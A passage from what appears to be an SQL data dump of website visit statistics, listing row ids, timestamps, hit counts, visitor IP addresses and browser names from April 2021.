e'),(553090,1618305908,1,1,0,0,'173.252.111.7','other'),(553091,1618314902,1,1,0,0,'188.190.69.161','chrome'),(553092,1618319640,1,1,0,0,'66.249.70.47','chrome'),(553093,1618321974,1,1,0,0,'66.249.70.49','chrome'),(553094,1618322180,1,1,0,0,'66.249.70.47','chrome'),(553095,1618327196,1,0,1,0,'66.249.70.51',''),(553096,1618330384,1,0,1,0,'66.249.70.49',''),(553097,1618330757,1,1,0,0,'66.249.70.47','chrome'),(553098,1618331411,1,1,0,0,'66.249.70.51','chrome'),(553099,1618342569,1,1,0,0,'34.77.162.21','other'),(553100,1618345983,1,1,0,0,'176.105.210.74','chrome'),(553101,1618348768,1,1,0,0,'66.249.70.51','chrome'),(553102,1618350774,1,1,0,0,'107.150.52.196','chrome'),(553103,1618352660,1,1,0,0,'66.249.70.49','chrome'),(553104,1618355359,1,1,0,0,'192.151.156.188','chrome'),(553105,1618360127,1,1,0,0,'66.249.70.51','chrome'),(553106,1618361517,1,1,0,0,'34.77.162.4','other'),(553107,1618361822,1,1,0,0,'66.249.70.51','chrome'),(553108,1618363737,1,0,1,0,'66.249.70.47',''),(553109,1618368995,1,0,1,0,'66.249.70.49',''),(553110,1618371690,1,1,0,0,'192.151.156.188','chrome'),(553111,1618373711,1,1,0,0,'66.249.70.47','chrome'),(553112,1618375406,1,1,0,0,'31.13.127.5','other'),(553113,1618382676,1,1,0,0,'31.13.103.118','other'),(553114,1618382677,1,1,0,0,'31.13.103.24','other'),(553115,1618382689,1,1,0,0,'173.252.95.13','other'),(553116,1618398091,1,1,0,0,'173.252.127.29','other'),(553117,1618398114,1,1,0,0,'31.13.127.19','other'),(553118,1618399726,2,2,0,0,'31.13.127.18','other'),(553119,1618403720,3,3,0,0,'157.245.231.45','firefox'),(553120,1618408861,1,1,0,0,'66.249.70.47','chrome'),(553121,1618419751,1,0,1,0,'66.249.70.51',''),(553122,1618424450,3,3,0,0,'51.79.176.221','firefox'),(553123,1618424952,1,1,0,0,'23.228.109.147','chrome'),(553124,1618439443,1,1,0,0,'23.228.109.147','chrome'),(553125,1618456162,1,0,1,0,'66.249.70.47',''),(553126,1618466612,15,15,0,0,'91.211.251.49','other'),(553127,1618466613,15,15,0,0,'91.211.251.49','chrome'),(553129,1618468081,1,0,1,0,'66.249.70.47',''),(553130,1618490354,1,1,0,0,'107.150.63.172','chrome'),(553131,1618496870,1,1,0,0,'31.13.127.32','other'),(553132,1618505943,1,0,1,0,'66.249.70.51',''),(553133,1618506827,1,1,0,0,'185.237.217.11','chrome'),(553134,1618521450,1,0,1,0,'66.249.70.47',''),(553135,1618521721,4,0,4,0,'66.249.70.49',''),(553136,1618527642,1,1,0,0,'23.228.109.147','chrome'),(553137,1618533086,1,1,0,0,'66.249.70.49','chrome'),(553138,1618535600,1,0,1,0,'66.249.70.49',''),(553139,1618536122,1,0,1,0,'66.249.70.51',''),(553140,1618536145,1,1,0,0,'66.249.70.49','chrome'),(553141,1618545711,1,1,0,0,'34.96.130.9','other'),(553142,1618548189,1,1,0,0,'34.86.35.31','other'),(553143,1618551124,5,5,0,0,'52.52.190.187','chrome'),(553144,1618554623,1,1,0,0,'66.249.70.47','chrome'),(553145,1618567893,1,1,0,0,'69.171.251.5','other'),(553146,1618577368,1,1,0,0,'199.244.88.132','chrome'),(553147,1618581971,2,2,0,0,'185.237.217.11','chrome'),(553148,1618582032,1,1,0,0,'128.124.216.77','chrome'),(553149,1618583515,5,5,0,0,'34.209.105.222','chrome'),(553150,1618594135,1,1,0,0,'66.249.70.51','chrome'),(553151,1618595805,1,1,0,0,'91.196.178.186','chrome'),(553152,1618596732,1,0,1,0,'66.249.70.47',''),(553153,1618599846,1,1,0,0,'91.196.178.186','chrome'),(553154,1618600921,1,1,0,0,'91.196.178.74','chrome'),(553155,1618609915,1,1,0,0,'31.13.127.32','other'),(553156,1618622756,1,0,1,0,'66.249.70.47',''),(553157,1618631407,1,1,0,0,'31.13.115.1','other'),(553158,1618638425,1,1,0,0,'188.163.32.24','chrome'),(553159,1618641175,5,5,0,0,'35.180.147.121','chrome'),(553160,1618648613,1,0,1,0,'66.249.70.47',''),(553161,1618653620,1,1,0,0,'193.226.12.204','firefox'),(553162,1618657368,2,2,0,0,'185.237.217.11','chrome'),(553163,1618659466,2,2,0,0,'77.111.244.27','chrome'),(553164,1618659639,1,1,0,0,'185.237.217.11','chrome'),(553165,1618660584,1,1,0,0,'185.237.217.11','chrome'),(553166,1618662085,2,2,0,0,'185.237.217.11','chrome'),(553167,1618663455,2,2,0,0,'185.237.217.11','chrome'),(553168,1618664869,3,3,0,0,'185.237.217.11','chrome'),(553169,1618665967,5,5,0,0,'185.237.217.11','chrome'),(553170,1618666939,1,1,0,0,'185.237.217.11','chrome'),(553171,1618668327,5,5,0,0,'185.237.217.11','chrome'),(553172,1618669267,1,1,0,0,'185.237.217.11','chrome'),(553173,1618670527,2,2,0,0,'185.237.217.11','chrome'),(553174,1618671886,1,0,1,0,'66.249.70.51',''),(553175,1618672302,1,1,0,0,'66.249.70.49','chrome'),(553176,1618673548,1,0,1,0,'66.249.70.47',''),(553177,1618674048,5,5,0,0,'13.232.96.15','chrome'),(553178,1618678207,1,1,0,0,'185.237.217.11','chrome'),(553179,1618679933,1,1,0,0,'52.30.100.235','other'),(553180,1618682866,1,0,1,0,'66.249.70.49',''),(553181,1618693346,1,1,0,0,'66.249.70.47','chrome'),(553182,1618709280,1,0,1,0,'66.249.70.47',''),(553183,1618723563,1,1,0,0,'31.13.127.25','other'),(553184,1618725137,1,1,0,0,'31.13.127.26','other'),(553185,1618725206,1,1,0,0,'31.13.127.10','other'),(553186,1618725207,1,1,0,0,'31.13.127.22','other'),(553187,1618725231,2,2,0,0,'185.237.217.11','chrome'),(553188,1618729372,1,1,0,0,'66.249.70.51','chrome'),(553189,1618729972,1,1,0,0,'103.71.255.100','firefox'),(553190,1618733927,1,0,1,0,'66.249.70.49',''),(553191,1618735759,1,0,1,0,'66.249.70.51',''),(553192,1618738016,1,1,0,0,'66.249.70.49','chrome'),(553193,1618738233,1,1,0,0,'23.228.109.147','chrome'),(553194,1618744796,1,1,0,0,'31.13.127.5','other'),(553195,1618744824,1,1,0,0,'173.252.95.6','other'),(553196,1618746260,1,1,0,0,'66.249.70.49','chrome'),(553197,1618748587,5,5,0,0,'13.124.222.242','chrome'),(553198,1618750326,1,1,0,0,'23.228.109.147','chrome'),(553199,1618758618,2,2,0,0,'194.44.128.157','chrome'),(553200,1618759877,2,2,0,0,'91.196.178.79','chrome'),(553201,1618760797,1,1,0,0,'91.196.178.79','chrome'),(553202,1618761271,1,1,0,0,'185.237.217.11','chrome'),(553203,1618761885,4,4,0,0,'31.13.127.34','other'),(553204,1618761886,1,1,0,0,'31.13.127.20','other'),(553205,1618761887,1,1,0,0,'31.13.127.35','other'),(553206,1618761891,2,2,0,0,'31.13.127.17','other'),(553207,1618761892,1,1,0,0,'31.13.127.18','other'),(553209,1618761893,1,1,0,0,'31.13.127.24','other'),(553210,1618761928,1,1,0,0,'31.13.127.23','other'),(553211,1618761963,1,1,0,0,'173.252.127.11','other'),(553212,1618761992,1,1,0,0,'31.13.127.10','other'),(553213,1618762163,1,1,0,0,'37.73.52.207','chrome'),(553214,1618762228,1,1,0,0,'185.237.217.11','chrome'),(553215,1618762578,1,1,0,0,'46.211.79.10','chrome'),(553216,1618762703,1,1,0,0,'31.13.127.119','other'),(553219,1618762704,1,1,0,0,'31.13.127.1','other'),(553220,1618762705,2,2,0,0,'31.13.127.7','other'),(553222,1618762706,1,1,0,0,'31.13.127.13','other'),(553223,1618762712,1,1,0,0,'31.13.127.6','other'),(553224,1618762714,1,1,0,0,'31.13.127.3','other'),(553225,1618762724,1,1,0,0,'66.220.149.16','other'),(553226,1618762748,1,1,0,0,'92.118.160.57','other'),(553227,1618763076,1,1,0,0,'66.249.66.88','chrome'),(553228,1618763158,1,1,0,0,'176.122.127.101','chrome'),(553229,1618763161,1,1,0,0,'91.229.101.124','chrome'),(553230,1618763453,1,1,0,0,'185.237.217.11','chrome'),(553231,1618763480,1,1,0,0,'91.222.16.164','chrome'),(553232,1618764150,1,1,0,0,'31.13.127.29','other'),(553233,1618764151,1,1,0,0,'31.13.127.10','other'),(553234,1618764152,2,2,0,0,'31.13.127.22','other'),(553237,1618764161,1,1,0,0,'31.13.127.12','other'),(553239,1618764162,1,1,0,0,'31.13.127.6','other'),(553241,1618764163,1,1,0,0,'31.13.127.25','other'),(553242,1618765271,1,1,0,0,'185.237.217.11','chrome'),(553243,1618765292,1,1,0,0,'37.55.132.147','chrome'),(553244,1618765300,1,1,0,0,'66.249.66.88','chrome'),(553245,1618765661,1,1,0,0,'66.220.149.16','other'),(553246,1618766245,1,1,0,0,'91.229.101.124','chrome'),(553247,1618767853,1,1,0,0,'173.252.87.33','other'),(553248,1618768162,1,0,1,0,'66.249.66.89',''),(553249,1618768904,1,1,0,0,'31.13.127.24','other'),(553250,1618768973,1,1,0,0,'176.118.52.54','chrome'),(553251,1618769725,1,1,0,0,'94.153.8.66','chrome'),(553252,1618769874,2,2,0,0,'178.74.214.235','firefox'),(553253,1618770026,1,1,0,0,'173.252.79.34','other'),(553254,1618770380,1,1,0,0,'176.36.103.203','chrome'),(553255,1618770569,1,1,0,0,'94.231.189.136','chrome'),(553256,1618770761,1,1,0,0,'69.171.249.8','other'),(553257,1618770773,1,1,0,0,'185.237.217.11','chrome'),(553258,1618770837,1,1,0,0,'46.133.224.81','chrome'),(553259,1618771451,1,1,0,0,'66.249.66.87','chrome'),(553260,1618771770,1,1,0,0,'5.58.162.123','chrome'),(553261,1618771777,1,1,0,0,'66.249.66.88','chrome'),(553262,1618771833,1,1,0,0,'94.153.29.97','chrome'),(553263,1618772762,1,1,0,0,'66.249.66.87','chrome'),(553264,1618773168,1,1,0,0,'173.252.111.111','other'),(553265,1618773292,1,1,0,0,'66.220.149.20','other'),(553266,1618774505,1,1,0,0,'46.211.44.81','chrome'),(553267,1618774699,1,1,0,0,'77.111.247.77','chrome'),(553268,1618774788,1,1,0,0,'91.196.178.88','chrome'),(553269,1618776013,1,1,0,0,'77.111.244.4','chrome'),(553270,1618783302,1,1,0,0,'93.126.100.236','chrome'),(553271,1618802423,1,1,0,0,'66.249.66.87','chrome'),(553272,1618804814,1,1,0,0,'66.220.149.112','other'),(553273,1618804812,1,1,0,0,'66.220.149.50','other'),(553277,1618805954,1,1,0,0,'31.13.127.23','other'),(553278,1618805955,1,1,0,0,'31.13.127.118','other'),(553279,1618806616,1,1,0,0,'173.252.127.14','other'),(553280,1618806617,1,1,0,0,'173.252.127.16','other'),(553281,1618806677,1,1,0,0,'173.252.95.28','other'),(553282,1618812261,1,1,0,0,'185.237.217.11','chrome'),(553283,1618812983,1,1,0,0,'173.252.87.11','other'),(553284,1618813711,2,1,1,0,'66.249.66.88',''),(553285,1618813733,1,1,0,0,'5.199.239.134','chrome'),(553286,1618816128,2,2,0,0,'178.54.144.214','chrome'),(553287,1618816161,1,1,0,0,'31.13.127.17','other'),(553288,1618817269,1,1,0,0,'91.224.97.41','chrome'),(553289,1618819142,1,1,0,0,'66.220.149.4','other'),(553290,1618819143,1,1,0,0,'66.220.149.21','other'),(553291,1618820302,1,1,0,0,'176.121.5.92','chrome'),(553292,1618820377,1,1,0,0,'31.13.127.17','other'),(553293,1618820435,1,0,1,0,'66.249.66.87',''),(553294,1618821163,1,1,0,0,'69.171.251.1','other'),(553295,1618821533,1,0,1,0,'66.249.66.88',''),(553296,1618823467,1,0,1,0,'66.249.66.88',''),(553297,1618828864,1,1,0,0,'173.252.127.118','other'),(553298,1618828865,1,1,0,0,'173.252.127.113','other'),(553299,1618829267,1,1,0,0,'89.70.163.201','chrome'),(553300,1618829997,1,1,0,0,'66.249.66.88','chrome'),(553301,1618830483,1,1,0,0,'66.220.149.20','other'),(553302,1618831922,1,1,0,0,'185.237.217.11','chrome'),(553303,1618834350,1,1,0,0,'173.252.111.19','other'),(553305,1618837097,1,1,0,0,'69.171.251.22','other'),(553306,1618837149,1,1,0,0,'173.252.127.31','other'),(553307,1618844713,1,1,0,0,'77.111.244.29','chrome'),(553308,1618845289,1,1,0,0,'66.249.66.89','chrome'),(553309,1618846280,3,3,0,0,'173.252.111.117','other'),(553310,1618846281,2,2,0,0,'173.252.111.16','other'),(553311,1618846282,1,1,0,0,'69.171.251.7','other'),(553312,1618849018,1,1,0,0,'66.220.149.119','other'),(553313,1618849270,1,1,0,0,'185.237.217.11','chrome'),(553314,1618856304,1,1,0,0,'173.252.87.17','other'),(553315,1618856305,1,1,0,0,'173.252.87.18','other'),(553316,1618857004,1,1,0,0,'94.153.38.114','chrome'),(553317,1618860015,1,1,0,0,'77.111.246.21','chrome'),(553318,1618863702,1,1,0,0,'95.46.104.143','chrome'),(553319,1618863775,1,1,0,0,'94.153.83.120','chrome'),(553320,1618864910,1,1,0,0,'94.153.6.200','chrome'),(553321,1618877192,1,1,0,0,'66.249.70.47','chrome'),(553322,1618882924,1,0,1,0,'66.249.70.47',''),(553323,1618890321,1,1,0,0,'194.44.50.24','chrome'),(553324,1618892479,1,1,0,0,'94.153.0.87','chrome'),(553325,1618895662,1,1,0,0,'51.15.146.61','firefox'),(553326,1618899790,1,0,1,0,'66.249.70.47',''),(553327,1618909550,1,1,0,0,'173.252.111.23','other'),(553328,1618911548,1,0,1,0,'66.249.70.49',''),(553329,1618912166,1,1,0,0,'88.155.48.184','chrome'),(553330,1618912820,1,1,0,0,'66.249.70.47','chrome'),(553331,1618912869,1,1,0,0,'91.211.251.49','chrome'),(553332,1618912871,1,1,0,0,'35.187.134.52','other'),(553333,1618912872,1,1,0,0,'35.187.134.50','other'),(553334,1618920325,5,5,0,0,'18.136.72.135','chrome'),(553335,1618922701,2,1,1,0,'66.249.70.47',''),(553336,1618925555,1,1,0,0,'94.153.88.189','chrome'),(553337,1618939586,1,1,0,0,'123.16.32.207','other'),(553338,1618939617,1,1,0,0,'128.199.72.244','msie'),(553339,1618939625,1,1,0,0,'115.71.238.153','msie'),(553340,1618939989,1,0,1,0,'66.249.70.47',''),(553341,1618940126,1,1,0,0,'65.52.183.8','chrome'),(553342,1618940304,1,1,0,0,'60.30.66.195','chrome'),(553343,1618940482,1,1,0,0,'95.68.166.251','chrome'),(553344,1618941182,1,1,0,0,'170.78.198.101','chrome'),(553345,1618941212,1,1,0,0,'120.50.18.42','other'),(553346,1618941476,1,1,0,0,'171.35.168.198','other'),(553347,1618941600,1,1,0,0,'117.240.138.182','chrome'),(553348,1618941807,1,1,0,0,'103.81.24.8','other'),(553349,1618941848,1,1,0,0,'113.173.151.242','msie'),(553350,1618942114,1,1,0,0,'171.35.167.249','chrome'),(553351,1618942128,1,1,0,0,'85.105.206.68','chrome'),(553352,1618942388,1,1,0,0,'221.236.220.20','msie'),(553353,1618942411,1,1,0,0,'201.63.155.211','chrome'),(553354,1618942518,1,1,0,0,'222.82.252.238','chrome'),(553355,1618942595,1,1,0,0,'58.102.100.126','msie'),(553356,1618942614,1,1,0,0,'61.74.221.85','msie'),(553357,1618942699,1,1,0,0,'223.197.134.182','chrome'),(553358,1618942861,1,1,0,0,'218.93.14.235','other'),(553359,1618943137,1,1,0,0,'190.29.103.109','other'),(553360,1618943160,1,1,0,0,'110.78.155.209','other'),(553361,1618943295,1,1,0,0,'174.138.80.226','chrome'),(553362,1618944191,1,1,0,0,'66.249.70.51','chrome'),(553363,1618944355,1,1,0,0,'117.82.39.148','other'),(553364,1618944444,1,1,0,0,'185.216.252.239','chrome'),(553365,1618944461,1,1,0,0,'203.110.163.155','msie'),(553366,1618944485,1,1,0,0,'221.224.114.229','chrome'),(553367,1618944690,1,1,0,0,'218.151.55.207','chrome'),(553368,1618944835,1,1,0,0,'110.36.234.158','other'),(553369,1618944843,1,1,0,0,'37.192.137.50','other'),(553370,1618944881,1,1,0,0,'201.184.241.243','other'),(553371,1618944954,1,1,0,0,'104.236.11.126','chrome'),(553372,1618944988,1,1,0,0,'103.234.68.98','chrome'),(553373,1618945093,1,1,0,0,'194.44.181.253','chrome'),(553374,1618945136,1,1,0,0,'173.252.111.4','other'),(553375,1618945138,1,1,0,0,'173.252.111.16','other'),(553376,1618945304,1,1,0,0,'177.39.223.93','chrome'),(553377,1618945539,1,1,0,0,'186.239.150.70','chrome'),(553378,1618945554,1,1,0,0,'14.162.190.82','other'),(553379,1618945896,1,1,0,0,'191.13.128.45','msie'),(553380,1618946328,1,1,0,0,'188.210.166.84','other'),(553381,1618946356,1,1,0,0,'60.173.243.229','chrome'),(553382,1618946517,1,1,0,0,'113.173.205.106','chrome'),(553383,1618946537,1,1,0,0,'110.36.227.110','msie'),(553384,1618946659,1,1,0,0,'213.138.74.85','msie'),(553385,1618946719,1,1,0,0,'186.226.6.189','msie'),(553386,1618947550,1,1,0,0,'200.232.15.41','other'),(553387,1618947572,1,1,0,0,'220.127.98.158','other'),(553388,1618947744,1,1,0,0,'123.16.32.207','firefox'),(553389,1618948655,1,1,0,0,'113.140.84.86','other'),(553390,1618949268,1,1,0,0,'213.138.74.85','other'),(553391,1618949270,1,1,0,0,'110.36.218.254','msie'),(553392,1618949598,1,1,0,0,'81.161.142.153','msie'),(553393,1618953381,1,1,0,0,'66.249.70.47','chrome'),(553394,1618954211,1,1,0,0,'31.13.127.23','other'),(553395,1618958268,1,1,0,0,'36.99.136.133','chrome'),(553396,1618961936,1,1,0,0,'66.249.70.49','chrome'),(553397,1618961966,1,0,1,0,'66.249.70.47',''),(553398,1618963365,2,2,0,0,'42.236.10.78','chrome'),(553399,1618963376,2,2,0,0,'42.236.10.84','chrome'),(553400,1618963389,1,1,0,0,'36.99.136.140','chrome'),(553401,1618963568,1,1,0,0,'36.99.136.143','chrome'),(553402,1618963708,1,1,0,0,'42.236.10.125','chrome'),(553403,1618963720,1,1,0,0,'42.236.10.114','chrome'),(553404,1618965125,2,1,1,0,'66.249.70.49',''),(553405,1618967301,1,1,0,0,'123.121.165.17','chrome'),(553406,1618968329,1,0,1,0,'66.249.70.47',''),(553407,1618970719,1,0,1,0,'66.249.66.88',''),(553408,1618971323,1,1,0,0,'171.13.14.50','chrome'),(553409,1618971345,1,1,0,0,'171.13.14.75','chrome'),(553410,1618981392,1,1,0,0,'66.249.66.88','chrome'),(553411,1618982046,1,1,0,0,'164.132.48.179','firefox'),(553414,1618983187,1,1,0,0,'34.77.162.21','other'),(553415,1618984226,1,1,0,0,'34.96.130.17','other'),(553416,1618984652,1,1,0,0,'66.249.66.89','chrome'),(553417,1618988286,11,10,1,0,'66.249.66.87',''),(553418,1618988297,4,2,2,0,'66.249.66.88',''),(553419,1618988533,1,1,0,0,'66.249.66.89','chrome'),(553420,1618988891,1,1,0,0,'66.249.66.87','chrome'),(553421,1618989124,5,5,0,0,'13.232.96.15','chrome'),(553422,1618989360,3,1,2,0,'66.249.66.88',''),(553423,1618989594,1,0,1,0,'66.249.66.89',''),(553424,1618991173,3,3,0,0,'159.65.128.164','firefox'),(553425,1618992251,1,1,0,0,'66.249.66.87','chrome'),(553426,1618992689,1,1,0,0,'46.175.189.248','chrome'),(553427,1618993615,1,1,0,0,'179.43.169.181','firefox'),(553428,1618993791,1,0,1,0,'66.249.66.87',''),(553429,1618994069,1,1,0,0,'66.249.66.88','chrome'),(553430,1618994147,1,1,0,0,'64.246.165.170','firefox'),(553431,1618994690,1,1,0,0,'69.171.249.19','other'),(553432,1618998364,1,0,1,0,'66.249.66.88',''),(553433,1619000140,1,1,0,0,'75.126.154.10','other'),(553434,1619000160,1,1,0,0,'173.193.191.202','other'),(553435,1619000941,1,1,0,0,'219.139.131.21','msie'),(553436,1619001210,1,1,0,0,'200.69.78.14','chrome'),(553437,1619001373,1,1,0,0,'218.93.124.18','msie'),(553438,1619001382,1,1,0,0,'66.249.66.88','chrome'),(553439,1619001760,1,1,0,0,'103.58.117.46','chrome'),(553440,1619001927,1,1,0,0,'58.216.218.236','msie'),(553441,1619002047,1,1,0,0,'195.128.135.211','chrome'),(553442,1619002178,1,1,0,0,'113.172.121.136','msie'),(553443,1619002199,1,1,0,0,'90.189.161.120','other'),(553444,1619002270,1,1,0,0,'95.108.30.198','msie'),(553445,1619002303,1,1,0,0,'88.217.190.243','other'),(553446,1619002386,1,1,0,0,'61.150.88.22','chrome'),(553447,1619002524,1,1,0,0,'69.50.64.32','chrome'),(553448,1619002600,1,1,0,0,'219.156.107.98','msie'),(553449,1619002619,1,1,0,0,'5.172.7.55','msie'),(553450,1619002681,1,1,0,0,'110.37.205.118','chrome'),(553451,1619002819,1,1,0,0,'121.7.33.183','other'),(553452,1619003012,1,1,0,0,'125.177.207.163','chrome'),(553453,1619003255,1,1,0,0,'180.174.13.237','other'),(553454,1619003493,1,1,0,0,'42.61.191.133','other'),(553455,1619004229,1,1,0,0,'218.87.160.249','msie'),(553456,1619004740,1,1,0,0,'122.226.156.118','chrome'),(553457,1619005662,1,1,0,0,'122.230.11.133','msie'),(553458,1619006120,1,1,0,0,'103.221.76.131','msie'),(553459,1619006590,1,1,0,0,'191.13.128.45','msie'),(553460,1619006700,1,1,0,0,'218.93.21.118','msie'),(553461,1619007397,1,1,0,0,'116.52.144.30','chrome'),(553462,1619008072,1,1,0,0,'60.174.118.80','other'),(553463,1619008201,1,1,0,0,'96.75.195.171','msie'),(553464,1619008698,1,1,0,0,'188.126.35.128','firefox'),(553465,1619008832,1,1,0,0,'189.20.129.90','chrome'),(553466,1619008854,1,1,0,0,'115.79.46.38','chrome'),(553467,1619008981,1,1,0,0,'221.130.130.238','chrome'),(553468,1619008995,1,1,0,0,'58.211.169.50','chrome'),(553469,1619009887,1,1,0,0,'158.140.137.186','other'),(553470,1619011480,1,1,0,0,'132.255.224.117','chrome'),(553471,1619011593,1,1,0,0,'203.242.141.91','msie'),(553472,1619011863,1,1,0,0,'5.152.144.35','chrome'),(553473,1619011886,1,1,0,0,'113.167.67.110','chrome'),(553474,1619012244,1,1,0,0,'171.241.18.231','chrome'),(553475,1619012954,1,1,0,0,'201.158.27.164','other'),(553476,1619013331,1,1,0,0,'114.104.155.95','chrome'),(553477,1619013587,1,1,0,0,'197.255.207.98','chrome'),(553478,1619013588,1,1,0,0,'173.252.79.24','other'),(553479,1619013734,1,0,1,0,'66.249.66.87',''),(553480,1619013740,1,1,0,0,'66.249.66.88','chrome'),(553481,1619013979,1,1,0,0,'219.143.120.34','firefox'),(553482,1619014170,1,1,0,0,'113.53.220.21','other'),(553483,1619014695,1,1,0,0,'14.200.144.210','other'),(553484,1619015205,3,3,0,0,'66.249.66.87','chrome'),(553485,1619015266,1,1,0,0,'122.224.213.66','chrome'),(553486,1619015308,1,1,0,0,'66.249.66.88','chrome'),(553487,1619015574,2,2,0,0,'66.249.66.89','chrome'),(553488,1619016437,1,1,0,0,'116.97.148.181','chrome'),(553489,1619016858,1,1,0,0,'66.249.66.89','chrome'),(553490,1619017226,1,1,0,0,'170.250.150.10','other'),(553491,1619017418,1,1,0,0,'58.16.188.39','firefox'),(553492,1619017440,1,1,0,0,'76.0.17.68','msie'),(553493,1619017769,1,1,0,0,'66.249.66.89','chrome'),(553494,1619017773,1,1,0,0,'83.139.138.31','msie'),(553495,1619017775,1,1,0,0,'61.77.17.65','msie'),(553496,1619018039,1,1,0,0,'103.233.204.110','chrome'),(553497,1619018796,1,1,0,0,'61.109.247.56','other'),(553498,1619018986,1,1,0,0,'162.191.157.147','chrome'),(553499,1619019126,1,1,0,0,'60.172.230.184','firefox'),(553500,1619019398,1,1,0,0,'195.128.135.211','msie'),(553501,1619019664,1,1,0,0,'103.228.143.221','chrome'),(553502,1619019696,1,1,0,0,'185.110.214.44','chrome'),(553503,1619019699,1,1,0,0,'103.252.118.81','chrome'),(553504,1619019840,1,1,0,0,'58.82.143.114','chrome'),(553505,1619020291,1,1,0,0,'121.28.181.154','chrome'),(553506,1619021055,1,1,0,0,'122.187.225.35','other'),(553507,1619021666,1,0,1,0,'66.249.66.88',''),(553508,1619021762,1,1,0,0,'192.151.156.187','firefox'),(553509,1619022067,1,1,0,0,'113.173.188.163','other'),(553510,1619022350,1,1,0,0,'177.154.49.187','other'),(553511,1619022488,1,1,0,0,'85.233.132.6','other'),(553512,1619022672,1,1,0,0,'42.119.252.188','other'),(553513,1619022854,1,1,0,0,'27.115.240.120','other'),(553514,1619023540,1,1,0,0,'113.172.242.222','chrome'),(553515,1619023879,1,1,0,0,'189.56.166.5','msie'),(553516,1619024152,1,1,0,0,'186.226.170.235','msie'),(553517,1619024284,1,1,0,0,'66.249.66.87','chrome'),(553518,1619024671,1,1,0,0,'62.106.106.36','other'),(553519,1619024789,1,1,0,0,'189.20.129.90','other'),(553520,1619024802,1,1,0,0,'191.13.128.45','firefox'),(553521,1619024938,1,1,0,0,'202.153.35.142','other'),(553522,1619024957,1,1,0,0,'66.249.66.89','chrome'),(553523,1619025115,1,1,0,0,'1.31.63.243','other'),(553524,1619025184,1,1,0,0,'201.63.155.211','msie'),(553525,1619026175,1,1,0,0,'186.239.155.106','msie'),(553526,1619027507,1,1,0,0,'103.193.191.8','other'),(553527,1619028100,1,1,0,0,'187.216.254.50','chrome'),(553528,1619028334,1,1,0,0,'218.93.21.118','msie'),(553529,1619028405,1,1,0,0,'27.116.125.146','msie'),(553530,1619028531,1,1,0,0,'201.28.130.42','other'),(553531,1619028745,1,1,0,0,'93.95.88.73','other'),(553532,1619028955,1,1,0,0,'114.79.157.4','firefox'),(553533,1619029165,1,1,0,0,'220.81.21.160','msie'),(553534,1619029413,1,1,0,0,'175.101.130.142','chrome'),(553535,1619029438,1,1,0,0,'60.209.38.210','chrome'),(553536,1619029719,1,1,0,0,'171.221.255.5','chrome'),(553537,1619029884,1,1,0,0,'212.98.122.91','firefox'),(553538,1619030084,1,1,0,0,'92.39.97.46','msie'),(553539,1619031154,1,1,0,0,'122.187.224.227','other'),(553540,1619032881,1,1,0,0,'218.103.127.222','other'),(553541,1619033246,1,1,0,0,'87.229.206.106','chrome'),(553542,1619033464,1,1,0,0,'113.177.115.110','other'),(553543,1619034124,1,1,0,0,'202.153.33.62','msie'),(553544,1619034311,1,1,0,0,'91.200.114.216','chrome'),(553545,1619035189,1,1,0,0,'203.205.54.55','other'),(553546,1619035449,1,1,0,0,'83.13.170.66','other'),(553547,1619035564,1,1,0,0,'36.35.64.81','chrome'),(553548,1619035571,1,1,0,0,'103.254.134.142','msie'),(553549,1619035647,1,1,0,0,'121.162.101.73','chrome'),(553550,1619035925,1,1,0,0,'122.187.224.240','other'),(553551,1619036046,1,1,0,0,'186.239.155.106','chrome'),(553552,1619036113,1,1,0,0,'189.112.48.231','chrome'),(553553,1619036373,1,1,0,0,'103.43.80.8','chrome'),(553554,1619036446,1,1,0,0,'123.21.27.187','chrome'),(553555,1619036580,1,1,0,0,'14.172.156.2','other'),(553556,1619036729,1,1,0,0,'196.3.194.139','firefox'),(553557,1619037074,1,1,0,0,'157.122.183.218','msie'),(553558,1619037455,1,1,0,0,'96.75.195.171','msie'),(553559,1619037845,1,1,0,0,'202.175.173.66','chrome'),(553560,1619038052,1,1,0,0,'124.165.247.42','other'),(553561,1619038087,1,1,0,0,'202.137.141.199','other'),(553562,1619038825,1,1,0,0,'60.174.90.6','other'),(553563,1619039419,1,1,0,0,'220.127.98.188','other'),(553564,1619039648,1,1,0,0,'59.103.139.245','chrome'),(553565,1619040257,1,1,0,0,'178.18.241.225','other'),(553566,1619040426,1,1,0,0,'219.149.220.82','msie'),(553567,1619040471,1,1,0,0,'189.15.3.128','msie'),(553568,1619040525,1,1,0,0,'218.93.124.18','msie'),(553569,1619040673,1,1,0,0,'207.46.13.40','other'),(553570,1619041310,1,1,0,0,'168.227.169.68','other'),(553571,1619041330,1,1,0,0,'159.192.8.4','other'),(553572,1619041711,1,1,0,0,'125.142.46.84','msie'),(553573,1619042229,1,1,0,0,'66.249.66.88','chrome'),(553574,1619042255,1,1,0,0,'118.184.248.15','msie'),(553575,1619042600,1,1,0,0,'201.28.130.42','chrome'),(553576,1619042621,1,1,0,0,'112.120.82.77','chrome'),(553577,1619042623,1,1,0,0,'218.64.168.101','chrome'),(553578,1619043028,1,1,0,0,'222.253.158.57','other'),(553579,1619043349,1,1,0,0,'66.249.66.87','chrome'),(553580,1619043350,1,1,0,0,'66.249.66.88','chrome'),(553581,1619043455,1,1,0,0,'103.25.205.102','chrome'),(553582,1619043705,1,1,0,0,'85.119.74.212','msie'),(553583,1619043762,1,1,0,0,'122.187.224.251','msie'),(553584,1619043990,1,1,0,0,'110.36.218.70','other'),(553585,1619044153,1,0,1,0,'66.249.70.47',''),(553586,1619044293,1,1,0,0,'221.202.129.132','msie'),(553587,1619044599,1,1,0,0,'51.15.205.3','other'),(553588,1619044766,1,1,0,0,'189.56.160.102','chrome'),(553589,1619045338,1,1,0,0,'110.36.220.106','other'),(553590,1619045955,1,1,0,0,'58.83.193.84','msie'),(553591,1619045975,1,1,0,0,'103.234.68.98','msie'),(553592,1619046317,1,1,0,0,'77.75.6.34','other'),(553593,1619046919,1,1,0,0,'110.38.168.110','other'),(553594,1619047253,1,0,1,0,'66.249.70.51',''),(553595,1619047343,1,1,0,0,'110.36.230.122','other'),(553596,1619047510,1,1,0,0,'66.249.70.49','chrome'),(553597,1619047535,1,0,1,0,'66.249.70.47',''),(553598,1619047613,1,1,0,0,'36.99.136.140','chrome'),(553599,1619047708,1,1,0,0,'36.99.136.143','chrome'),(553600,1619048091,1,1,0,0,'218.87.158.154','chrome'),(553601,1619048095,1,1,0,0,'110.36.233.118','chrome'),(553602,1619048608,1,1,0,0,'51.158.98.24','other'),(553603,1619048757,1,1,0,0,'31.28.227.13','msie'),(553604,1619049162,1,1,0,0,'219.139.131.21','msie'),(55